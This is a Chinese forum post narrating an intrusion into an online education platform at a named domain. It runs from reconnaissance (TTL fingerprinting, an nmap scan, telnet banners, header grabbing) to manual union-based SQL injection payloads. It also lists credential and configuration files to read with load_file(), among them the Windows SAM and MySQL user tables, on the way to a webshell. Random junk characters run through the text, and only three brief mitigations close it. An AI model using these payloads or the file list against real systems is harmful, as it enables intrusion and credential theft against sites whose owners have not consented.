题记:
0 {! a$ F+ d( Q# I一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
, ^/ U1 a3 ~: {' V2 Y* q第一步:获取需要的信息1 V V3 C$ K. c
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
# g" ^- z1 P+ i/ X注:以下为保护特用XXX代替敏感信息* O5 x ~; N6 s0 `
顺手先PING了一下他们的域名:
$ O& }0 w' f, r$ H v: K) p; i9 mping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)* f, x8 s) O$ o" r. A; ]
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms1 i$ a, D9 O* @7 l3 M$ R2 ^
顺便了解一下TTL,学好基础知识才能一路顺风:: `* @' }* w4 H$ K4 v: D
TTL:(Time To Live ) 生存时间
/ \# D x B2 x( t2 p3 k8 B( x指定数据包被路由器丢弃之前允许通过的网段数量。% w9 W5 u" f6 ?1 n, l( [ R
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
3 O7 d* Q: b" t使用PING时涉及到的 ICMP 报文类型# e6 a0 R: z& X; T3 W% v
一个为ICMP请求回显(ICMP Echo Request)
. l- q4 M1 S* k5 W4 I" O一个为ICMP回显应答(ICMP Echo Reply)
' k+ N# a+ Q3 D0 o! YTTL 字段值可以帮助我们识别操作系统类型。, b0 x, d, V9 _& s* C
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255+ ~* ^ B) x9 C, F
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64; ^* c @8 A7 H9 z. d
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
& S9 q$ r5 c5 M! n" v2 |* u- U微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
) } \& c% `( c: I当然,返回的TTL值是相同的, Y% c" E+ y( j( m1 R5 T
但有些情况下有所特殊
' z& x* V3 h9 x: d5 V0 ZLINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
- W; i5 Y! {' Q" DFreeBSD 4.1, 4.0, 3.4;
1 }; z g) S9 u3 [! U8 ZSun Solaris 2.5.1, 2.6, 2.7, 2.8;
. P. F4 n3 m* b Z0 @OpenBSD 2.6, 2.7,
0 y. N( _; F) c9 n8 |; Q* b sNetBSD+ G1 V3 u: w$ a# m9 [7 ?. m% O9 z
HP UX 10.20
: K* h; W8 I7 Y+ xICMP 回显应答的 TTL 字段值为 255, h: ?( {2 n3 S
Windows 95/98/98SE- X( S( r' w) Y4 Y. Q
Windows ME
# T6 `! t' q+ d( m2 ]ICMP 回显应答的 TTL 字段值为 324 z0 h2 f$ b6 r& T# n
Windows NT4 WRKS
0 G- U# P( N. WWindows NT4 Server
" B0 K0 E0 d9 f9 W W* M FWindows 2000
! ?4 A; j6 m+ I$ iWindows XP
) q: Y, U/ N4 W! JICMP 回显应答的 TTL 字段值为 128; \" Y) Z+ Z1 G4 Z
这样,我们就可以通过这种方法来辨别操作系统& G3 ^! [" [/ W; K8 m8 U
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
M* M ?8 u1 e4 R用NMAP扫描一下:
; l- h0 t. g0 Onmap -sT -O XXX.XXX.XXX.XXX
2 L7 t- z z* I2 W, p! y: ~1 f如果没有装WinPcap则会弹出提示:7 n( [2 Z" w0 h7 ^
WARNING: Could not import all necessary WinPcap functions. You may need to upgr4 E( |3 k# k" l0 `; H
ade to version 3.1 or higher from http://www.winpcap.org. Resorting to connect(
1 C$ N( q8 B1 b( O( F0 j3 ?5 u) mode — Nmap may not function completely" W* d' ~2 `, t0 T: _2 R( i+ b
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
8 Q N# `$ k4 s: M: Tand iphlpapi.dll be installed. You seem to be missing one or both of these. Win7 n+ d5 i# t( V$ e0 T
pcap is available from http://www.winpcap.org. iphlpapi.dll comes with Win98 an
1 }2 v! C$ `/ V! R1 f7 s+ X) ^5 Md later operating sytems and NT 4.0 with SP4 or greater. For previous windows v1 k3 F# }+ D# A* j2 [. y3 v
ersions, you may be able to take iphlpapi.dll from another system and place it i
4 K; y1 U) ?. N) \6 {n your system32 dir (e.g. c:\windows\system32).
8 E, {- w" a1 H8 b% NQUITTING!% A9 f( b* [, w9 @$ F
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe* t8 L2 e, l6 ?! P! J8 S- F
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
, H- _2 R0 u$ k! e J+ q6 bInteresting ports on XXX.XXX.XXX.XXX:
m. [8 A3 A3 v$ F, U' oNot shown: 986 closed ports) |0 q4 ]- Q- o. o3 D
PORT STATE SERVICE
: Q7 @& w L* ]* d# N U) ?) y9 L21/tcp open ftp" \9 s1 i1 E3 G0 M; ^8 L( O
22/tcp open ssh
8 i1 ]: P+ P( _2 {- f23/tcp open telnet
$ @$ @! F* t2 E& ?7 i g80/tcp open http
* D. _0 L' P. ]; t6 w111/tcp open rpcbind
# |8 g3 j _2 e$ Z# T0 \135/tcp filtered msrpc+ c. K0 O e/ S& \
139/tcp filtered netbios-ssn# U$ B* s, _* W5 @0 i( W
445/tcp filtered microsoft-ds$ d% L& t2 e8 a* l8 D
513/tcp open login
! M. Q! x9 b& i1 _6 q514/tcp open shell% L0 H. v+ |3 f( P- p) R, g, g
593/tcp filtered http-rpc-epmap; \ Y2 d i- p# h# b% W
1720/tcp filtered H.323/Q.9318 C) Z8 |1 X: v( X5 T' D3 z# ?
3306/tcp open mysql4 n4 I ?7 W/ O
4444/tcp filtered krb524, X, _1 k1 G* _( d" M
Device type: WAP
+ u9 v) }9 C, U2 U9 y3 c# S; hRunning: Linux 2.4.X
) V+ r: @) G6 W7 e" C' f! n* MOS details: DD-WRT (Linux 2.4.35s). N3 T7 U! j5 n# t1 j
Network Distance: 13 hops
, {$ t3 L# ~8 f' H: S6 g看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:" E; M/ Z2 e" y6 e7 Z9 C; } p
login as:
7 G! B# u3 C' w5 l( ?) k9 d2 _Telnet23端口也是开着的,用telnet 命令链接一下:
4 D& z" H3 p0 Q7 h: ntelnet XXX.XXX.XXX.XXX \; j% c3 Z& ]. c, @; i
提示:& ]( N' ?( o) u' `" u
Red Hat Enterprise Linux Server release 5.2 (Tikanga)& M1 u- [8 k; D$ i) s# L. v
Kernel 2.6.18-92.el5PAE on an i686
7 q: @3 O! c& [# M9 ^; p* ^login:$ [" }8 T8 X W, R2 h* S
获取HTTP头信息:
$ W1 Z/ ]/ b3 W% X! E7 \' {! s在本地执行如下PHP代码 J I' |& @9 X6 j5 ~# v
<?php$ L) h9 c7 @! ]7 v& w- y* ?. i$ ]6 F
$url = ‘XXX.XXX.XXX.XXX’;
' f5 N* q4 V/ Y9 w6 b6 iprint_r(get_headers($url));
$ O7 _4 p9 A/ C7 W: r, S8 Aprint_r(get_headers($url, 1));
1 k" h0 s( J1 H?>
' i( \+ u- V* t. y$ n( q( t将以上代码保存为PHP文件,执行:) E' M, k* \& T* O5 K3 G
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )0 M( E% O# E" S G
现在可以得出结论:& X/ P4 X: H& g& }$ u
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga) Z% R( K2 z* |) G. E
内核版本:Kernel 2.6.18-92.el5PAE on an i686) \5 v7 K- `& _
WEB服务器版本:nginx/0.7.61
! U5 s8 g u- _3 d第二步,开始测试寻找漏洞
1 S$ g! J5 _6 \3 n) L1 ^9 v7 k分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
4 W$ Z9 @5 }4 A& C' C( m1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的2 y/ r8 V; ]) E# P B# q( R
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试$ y1 D# H9 j3 M$ b) _ P
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
\* y3 D: }; uhttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误5 o, R& U" A* @1 Q
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续! ^8 x; L! @! s, f
3、手工注入:' O' X. T$ ], u- }% Y: o2 R
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。- n! x, [6 y; v- V3 u; H5 [
3.1 猜测当前表字段数
) U1 L& p! u" ?http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
$ R! Z/ S( P; M' o U1 ?5 O+ T此处猜测有个简单的算法,都是有技巧的吗,呵呵$ N' A& O* E& K T: v: e9 C* T
算法简单如下:6 e, |" `1 Q8 z3 m6 L/ v% A
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;( v( k1 Y1 j! H" a8 `( o, m
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;! i1 X# s5 F5 N
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。3 W2 N- D8 n# ?& O8 R9 W
以此来判断,是否过界,配合取中算法猜出字段数。, }6 b( ^: }! M' G/ k, ]
举例:7 D! O4 O; A# x# |6 U. T
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常4 I9 ]% y/ q5 R3 a/ z$ n
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
; K) v1 o6 r1 D' z3 T此时3则为我们要找的字段数。
( P! y3 |2 [! L" Q2 q2 Z3.2 配合union联合查询字段在页面所位置% q- t6 g( D1 E3 e* G. K1 w! b; B
我们已经知道了字段数为3,此时则可以做如下操作:
5 V4 w8 z0 j/ C/ u+ X, Fhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,38 @, H$ g' C5 S' o: [
& Z9 T- a+ f) |0 M这样就可以测试到哪些字段在页面上有所显示了,如图:
, V% X7 c$ ^: q5 T! L" |0 j$ H$ @4 k+ R6 G5 M3 j
3.3 查敏感信息2 F2 X7 I; V8 z$ n4 O+ ^' o. Y) Z( }
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。: O2 ]7 i, K; i/ O5 O7 q3 L' ?
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
1 s5 F' e9 l' x! b* s0 u* `3.3.1 先查数据库用户、数据库名,以备后用,如图:
8 |5 q1 x5 Z6 P" O
( ~& o# _- J3 |6 O% f& B5 i得到数据库用户为root、数据库名为DBxx;
. E/ V. H) O& a( G3 V& D& {3.3.2 查配置文件
; B4 }, n, {9 W9 Q查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
8 d6 I8 c: X% _6 o查看文件有一定的条件限制:
+ P- N0 f% v' n6 N2 [欲读取文件必须在服务器上0 O4 D" M) l! n2 Q/ d) a
必须指定文件完整的路径: L; ^$ ^* r+ |0 r
必须有权限读取并且文件必须完全可读
' g9 E* c" ~+ w0 x欲读取文件必须小于 max_allowed_packet; Y! \; K. `' ?- o4 E
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
) [7 q# _7 p S8 ^% ~+ f5 n常用的一些:5 r6 `8 D4 @7 m$ j# f
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
- G& l/ `' W! w( r1 }+ E, S/usr/local/apache2/conf/httpd.conf |- z5 z4 v. E
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
- u0 H0 M. M7 R& f/ `/usr/local/app/php5/lib/php.ini //PHP相关设置
, F$ n+ Z. Z0 l1 {% b9 y/etc/sysconfig/iptables //从中得到防火墙规则策略
; D9 i$ x$ \- \+ y9 f. S9 T% A/etc/httpd/conf/httpd.conf // apache配置文件
$ [# S4 m/ J6 L1 O/etc/rsyncd.conf //同步程序配置文件! B# d7 R f" x! Y% h
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
/ i! ?: S1 c) o; L+ p/etc/my.cnf //mysql的配置文件
5 l4 C; ]" F" l8 C& X! h( q! Y3 x/etc/redhat-release //系统版本# z, K$ r: v# f; x' {9 s
/etc/issue
0 }2 x! n3 n; x( \/etc/issue.net1 G% K/ G8 m: k/ w e$ K0 E
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
# o, y2 p0 h8 e/ bc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码9 T: w/ m8 t9 T" G( b
c:\Program Files\Serv-U\ServUDaemon.ini
" A$ e* c9 W. V3 F$ ~c:\windows\my.ini //MYSQL配置文件$ z8 ?! x" _) o4 Y8 x! W
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
. h4 e6 f1 O6 q1 ^( O等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
% f9 q& z) h8 t* K3 z. W5 oc:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
) l, ]* |* t& z9 J% x) T4 Lc:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此/ U6 f5 n0 [ O x; b3 A+ S5 ~+ T
c:\Program Files\RhinoSoft.com\ServUDaemon.exe: d7 l1 x) Y# t/ e
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件/ H9 d" U: S- q p8 _; F8 u' I7 H9 b
//存储了pcAnywhere的登陆密码
' A" b( n y; u' L! E% [/ C: F; C由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。; p/ S- b' l! q0 K: |
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
$ r* ~3 S% f8 L# r( F: f2 G最后:防范措施( l5 c/ u. x K9 d
1、修复PHP注入漏洞;# j5 `8 X+ F" x% o6 W p1 o" P! c
2、Mysql使用普通权限的用户;+ s% w: ]. e/ [/ ^ {
3、升级linux内核至最新版本; |